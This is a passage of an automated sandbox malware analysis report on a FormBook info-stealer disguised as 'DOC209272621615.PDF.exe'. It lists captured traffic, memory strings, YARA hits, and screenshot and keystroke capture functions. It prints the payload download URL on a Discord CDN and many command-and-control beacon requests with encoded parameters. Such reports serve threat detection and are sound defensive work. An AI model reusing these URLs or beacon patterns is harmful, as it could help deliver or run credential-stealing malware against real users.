6f 70 74 69 6d 69 7a 65 5f 66 39 66 30 65 64 63 64 65 65 37 30 64 63 63 36 38 32 36 66 33 61 38 30 65 32 35 35 33 66 63 34 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 6d 69 6b 6b 6f 72 65 6d 6f 6e 2e 63 6f 6d 2f 34 30 34 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 3e 20 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 75 6d 69 6b 6b 6f 72 65 6d 6f 6e 2e 63 6f 6d 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 27 20 2f 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 27 61 6e 6f 6e 79 6d 6f 75 73 27 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Tue, 25 Jun 2019 07:07:19 GMTetag: "999-5d11c827-698982c0c6efc961;;;"accept-ranges: bytescontent-length: 2457date: Wed, 01 Dec 2021 15:25:12 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Dec 2021 15:25:22 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Dec 2021 15:26:50 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Wed, 01 Dec 2021 15:26:55 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Tue, 25 Jun 2019 07:07:19 GMTetag: "999-5d11c827-698982c0c6efc961;;;"accept-ranges: bytescontent-length: 2457date: Wed, 01 Dec 2021 15:27:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 2

URLs found in memory or binary data

Show sources

Source: DOC209272621615.PDF.exe, 00000000.00000003.288963925.00000000007AB000.00000004.00000001.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.294309422.00000000007B2000.00000004.00000001.sdmp, DOC209272621615.PDF.exe, 00000000.00000003.288276649.00000000007AB000.00000004.00000001.sdmp, WerFault.exe, 00000005.00000002.329958338.0000000004F64000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	String found in binary or memory: http://scheme.org/SiteNavigationElement
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	String found in binary or memory: http://sumikkoremon.com/wp-content/cache/autoptimize/js/autoptimize_11a5c4c4430017076e7a7babc5eec58b
Source: rundll32.exe, 00000012.00000003.791203124.0000000000509000.00000004.00000001.sdmp	String found in binary or memory: http://www.era636.com/pvxz/?e0DDHLix=lq5nkvJODZO3vjBQ1IcTTlcoFI8MUDuIstt0HJAs3uVUg2aG8/bxRH4x4Hgr0vc
Source: DOC209272621615.PDF.exe, 00000000.00000003.288963925.00000000007AB000.00000004.00000001.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.294309422.00000000007B2000.00000004.00000001.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.294280203.0000000000769000.00000004.00000020.sdmp, DOC209272621615.PDF.exe, 00000000.00000002.331410087.0000000000769000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: Wkklnmcz.exe, 0000000A.00000002.351491610.0000000002FFB000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflyt
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/Swiper/4.5.0/js/swiper.min.js?ver=5.8.2
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/2.1.2/TweenMax.min.js?ver=5.8.2
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/lity/2.3.1/lity.min.css
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/lity/2.3.1/lity.min.js?ver=5.8.2
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	String found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	String found in binary or memory: https://stats.wp.com/e-202148.js
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	String found in binary or memory: https://sumikkoremon.com/
Source: rundll32.exe, 00000012.00000002.817618573.0000000004D42000.00000004.00020000.sdmp	String found in binary or memory: https://widgets.getpocket.com/v1/j/btn.js?v=1

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=kv1trFZowiadIe+O9wf8jU76F0yWsAfdW5MSCImgWwgiD9GBizL2DmUTWvRLYZu8pEo+ HTTP/1.1Host: www.ncgf08.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.sa-pontianak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=gP6rjQtpXSIvmASTmEYziIOwC4Gfkrp9Oew9+ghHkWFgU4GrN+F2/eFp8+5BM1VAZDt9 HTTP/1.1Host: www.hbjngs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=T99sF+FFCMRVIrN5sJoW9bSX1euAJ0OSqUAUXGTCOoP2/2ZrE3P4zH5359id1TPJ7WYx&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.sumikkoremon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv HTTP/1.1Host: www.tourbox.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=5IYdhC0GHghhu3qU8D/jZG+rEeM2mibLCs+oL86uP0UJoc5Rrxh3LqrepKBtkhDSDZoq HTTP/1.1Host: www.jardingenesis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=VkzKqNHEMf7DVNqsETKs6wpXpLehvGO8WXwP2kNWjaoREXW57VMlBwZntpJdd+mq+oTm HTTP/1.1Host: www.enterprisedaas.computerConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=3PJirK5cgl2FciVCq4PQLPbrqQd5ReNTXZ5Wt3Cj+i9zWbfEV8YElnpOrs676e/lB9CQ&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.hwkm.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=GCiqwE+AocZAO2KzorVbe+5cAVR/sER9WTQIWH8MGwbYJAiKk6D+HvwNUH0eDnTOzOM/ HTTP/1.1Host: www.piiqrio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=vQJfxOtI611W+RxH9ddEKx+uNoigK/zmKccwwKjwQCCnv7782yRErdaxoTFecp96gNUO HTTP/1.1Host: www.neema.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=bCINk7waO+AAweJQetcshs4EXJImwvjnAC5D+DXKCvfhq7NWzMtc9ZOrSobl6zpZIFRB&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.cis136-tgarza.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=lWYs4BNKo2NyazceVzv2HGKqsI/0suNqMdeNhVGKV3g2YeuVsAaP6gNudbn3yhvqV62w HTTP/1.1Host: www.meishangtianhua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=Czkl40VpJiNRQJS5lWJnKFxHKlnZ6CRMuI4G/gd+YABSgkcyWt+GOUfbjiYokSpGPyAa&_FN4W=CV_PbjYpbVj HTTP/1.1Host: www.finetipster.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=TAqp8mx20QUzgyvQGraUKSgK7ecLW6Kyu1royTDzc6juJCT2xEuV+4TJn9imIiw/7sSq&8pqLWR=BzrlN6PpwXh HTTP/1.1Host: www.sa-pontianak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=AMbF+Q/e/AO7yIAHRf5aUfsWvc/33vy+f/8PmVMiF5qZYbHgDNTXzprpLW2ZF4YvRkgO&8pqLWR=BzrlN6PpwXh HTTP/1.1Host: www.localproperty.teamConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /pvxz/?e0DDHLix=9jDi6R9VCoWG4rsAVGD1PHclw17CfU64luC7Gj+dkvBZl+crlrbAkIZhlDMaD53GUfpv&8pqLWR=BzrlN6PpwXh HTTP/1.1Host: www.tourbox.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49757 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe

Code function: 6_2_00428690 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,LdrInitializeThunk,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

6_2_00428690

Creates a DirectInput object (often for capturing keystrokes)

Show sources

Source: DOC209272621615.PDF.exe, 00000000.00000002.331292006.000000000073A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Contains functionality to retrieve information about pressed keystrokes

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe

Code function: 6_2_0043F5F4 GetMessagePos,GetKeyboardState,

6_2_0043F5F4

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 12.0.mobsync.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mobsync.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Wkklnmcz.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.mobsync.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.460149911.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.352614232.000000000380E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.333032851.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.376476666.0000000010064000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.391644403.0000000005D72000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.352808142.0000000072481000.00000020.00000001.sdmp, type: MEMORY
